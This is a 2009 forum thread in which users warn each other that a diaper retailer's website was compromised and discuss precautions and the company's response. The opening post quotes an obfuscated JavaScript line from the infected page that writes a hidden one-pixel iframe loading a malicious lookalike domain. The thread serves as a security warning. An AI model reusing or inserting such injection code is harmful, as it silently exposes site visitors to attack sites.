Dry247.com compromised

bgi39jsjw0ggg · Jul 14, 2009

Just a quick FYI to everyone - dry247.com, makers & sellers of my favorite diaper, seems to have been hacked. Site still functions, but stopbadware.org has found that the site has embedded malicious code.

Things like:

Code:

document.write("<if"+''+'ra'+''+"m"+'e s'+"rc=\"h"+''+'tt'+"p:"+''+"/"+''+'/mic'+"roso"+'t'+''+'f.c'+"n"+'/'+"\" wid"+''+'th=1 he'+"igh"+''+'t'+"="+"2></i"+''+"f"+"ra"+''+""+''+"me"+'>');

That's a quick snipped from their page source. It's an embedded inline frame 1 pixel wide by 2 pixels high that loads up a chinese attack site (there's a couple other sites it embeds, but I didn't feel like posting them), so avoid them. I haven't done any more poking around than just looking at their page source (haven't even checked on what it's downloading from microsotf.cn - no, that's not a type-o), but it's possible that their server is infected and intercepting credit card data as well.

I'll be checking on this every so often, but you can see updated results from stopbadware.org yourself here: Stopbadware.org - Report for www.dry247.com

Do not - repeat, DO NOT - visit dry247.com for any reason. If you absolutely have to, please use firefox and the noscript addon and deny script permission to dry247.com until they fix this problem. That will protect your computer from being compromised as well. Under no circumstances should you buy from their website, since nothing you do can protect you from that if their transaction system is indeed compromised. If you are desperate and have to buy some, their contact info is (copy & pasted from their website)

[email protected]

1-888-dry-247-8
(1-888-379-2478)

Dry Care
1425 37th street
Suite 613
Brooklyn, NY, 11218

This makes me sad, since they make my favorite diaper and was going to buy a case. I can wait a couple days while they clear this up, though.

**EDIT**
Thanks to Technologic:
Google Safe Browsing diagnostic page for www.dry247.com < a link to the Google diagnostic page for Dry24/7's page. I should have posted this in the first place, thanks for catching it Technologic )

I've sent an email to them just to make sure they know.

**EDIT, Jul 28th 2009**

Their site is still down, no update as of yet as to when it will be back up. Why is it so few companies ever consider security or disaster recovery until it's too late?

diaperedwolfcub · Jul 14, 2009

OMG!!! I need some... I am running low here soon. You think if they know about this... they would put up underconstruction or something. Yikes!!!

EDIT PART:

Thank you so much for bringing this too out attention.

Technologic · Jul 14, 2009

Just for the hell of it I visited the site just to see what happens. But first of all I am on a VM so if anything happened i just delete the VM no big deal. I used chrome to get to it and of course it picked up on the fact that the site was infected. It gave me the option to see a google diagnostic of the page. If you are interested, The Diagnostic Page
Just if anyone wanted to see that. It about the site that tries to load up after you visit dry24/7 website.

Dakota13 · Jul 15, 2009

Good to know much appreciated.

Entity · Jul 15, 2009

If you still want to use the site, install the firefox NoScript extension. It won't allow any scripts like that from getting through without your knowledge. But more to the point, it is good that you people caught wind of a threat before it could do any real damage.

bgi39jsjw0ggg · Jul 15, 2009

Got a response from the Dry24/7 people today. They are aware of the problem now and they are working on a fix. They aren't sure how long it will take (a couple days?), and they say there is a possibility that they'll shut down the site for the time being.

Darkfinn · Jul 15, 2009

This has been going on for some time... I think it is a misidentified code. They have added a popup advertising system to their site... to generate extra revenue I guess... I think it is being wrongly identified as malicious.

Technologic · Jul 15, 2009

Darkfinn said:
This has been going on for some time... I think it is a misidentified code. They have added a popup advertising system to their site... to generate extra revenue I guess... I think it is being wrongly identified as malicious.

I don't think this is something they chose to do. I know they added popups but this is code that when you access their site it tries to force you onto a malicious website.

bgi39jsjw0ggg · Jul 15, 2009

Darkfinn said:
This has been going on for some time... I think it is a misidentified code. They have added a popup advertising system to their site... to generate extra revenue I guess... I think it is being wrongly identified as malicious.

Yeah, this isn't just popups. The javascript obfuscation clearly embeds hidden frames that open up known-malicious web pages, and the Dry 24/7 people themselves told me that they're investigating the problem. They describe their site as "victimized" and are trying to repair the problem.

chevre · Jul 15, 2009

I think before there was an issue with the site being misclassified by Avast! as malicious, but that was solved a while ago. This is something new nasty. Thanks for pointing it out!

audio file · Jul 16, 2009

Norton antivirus has given an equally bad report on the site

Mauiman · Jul 16, 2009

All I can say is that it is very disgusting that people actually do this sort of a thing. They done it to a site that I go to a great number of times as well. And to think I was going to go and check them out for some new diapers or at least to try out a new kind of a thick comfy and absorbent diaper as well.

Darkfinn · Jul 17, 2009

Well, they have taken the site down... at least until it is fixed... I wonder how many sales they will lose.

the0silent0alchemist · Jul 19, 2009

audio file said:
Norton antivirus has given an equally bad report on the site

norton antivirus, HAH, that bunch always pick up something, like tracking cookies,

seriously though, that sounds, YOUCH ill get the info out to everyone i know

Somore · Jul 21, 2009

I did call and order another box from DRY247. The price has gone up to $99 from $75.

chevre · Jul 21, 2009

Somore said:
I did call and order another box from DRY247. The price has gone up to $99 from $75.

That actually happened a while ago when the "overstock" sale ended. They're still worth it, but damn that was a good deal.

babysage · Jul 21, 2009

Well it figures that a site that would be visited by older adults would likely get hit. Before it got caught who knows what all got jacked from visitors.

chevre · Jul 21, 2009

I sort of doubt they specifically targeted the site. More likely it was either a worm, or they just scanned random websites looking for a vulnerability and that one happened to come up.

Slycamer · Jul 21, 2009

just so you know i am reporting this to there coustomer service. i kept there email

chevre · Jul 22, 2009

diaper degraw said:
just so you know i am reporting this to there coustomer service. i kept there email

Perhaps you should check their site (or the rest of this thread

) first. They've already posted that they're aware of being compromised and the site is offline.

Dry247.com compromised

bgi39jsjw0ggg

diaperedwolfcub

Technologic

Dakota13

Entity

bgi39jsjw0ggg

Darkfinn

Banned

Technologic

bgi39jsjw0ggg

chevre

audio file

Mauiman

Darkfinn

Banned

the0silent0alchemist

Somore

chevre

babysage

chevre

Slycamer

chevre